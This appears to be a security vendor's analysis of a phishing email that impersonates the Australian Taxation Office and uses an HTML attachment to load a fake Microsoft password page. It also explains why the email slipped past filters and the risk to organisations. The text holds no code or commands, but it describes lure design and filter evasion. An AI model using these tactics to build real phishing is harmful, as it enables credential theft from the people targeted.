Impersonating the Australian Taxation Office, this attack informs the email recipient they have received a new funds transfer and advises them that the payment is currently on hold due to a necessary identity verification. Attached to the email is a supposed payment slip with additional details about the payment. The email was sent from a maliciously registered domain, with a Gmail reply-to email address. At the bottom of the email, the Australian Government Tax Office logo reinforces the theme and makes the phishing email appear more legitimate.
When a recipient opens the referenced attachment, they are presented with a Microsoft phishing page that has pre-populated their email address and states that their password needs to be verified “because you’re accessing sensitive info.”
Why It Bypassed Traditional Security
The URL found within the HTML attachment is one that has not been previously detected as malicious, allowing it to bypass traditional tools that rely on known bad indicators. The email’s reply-to address is sent from a Gmail account, a free webmail service available to anyone. As a result, there is no bad domain reputation for traditional security providers to discover, and the email passes all authentication checks for SPF, DKIM, and DMARC.
Detecting the Attack
HTML attachments are commonly used to deliver phishing payloads without having to include the malicious content in the email itself. An analysis of the HTML file identified a URL that had not been previously detected as malicious, allowing it to bypass traditional tools that rely on known bad indicators. In addition to understanding the intent of the link, a cloud email security platform analyzes the content of the email to determine whether it is malicious.
Risk to Organization
As soon as an employee enters their credentials, attackers have access to their email accounts, which can be used to gather sensitive information or to launch attacks on coworkers, customers, or vendors.
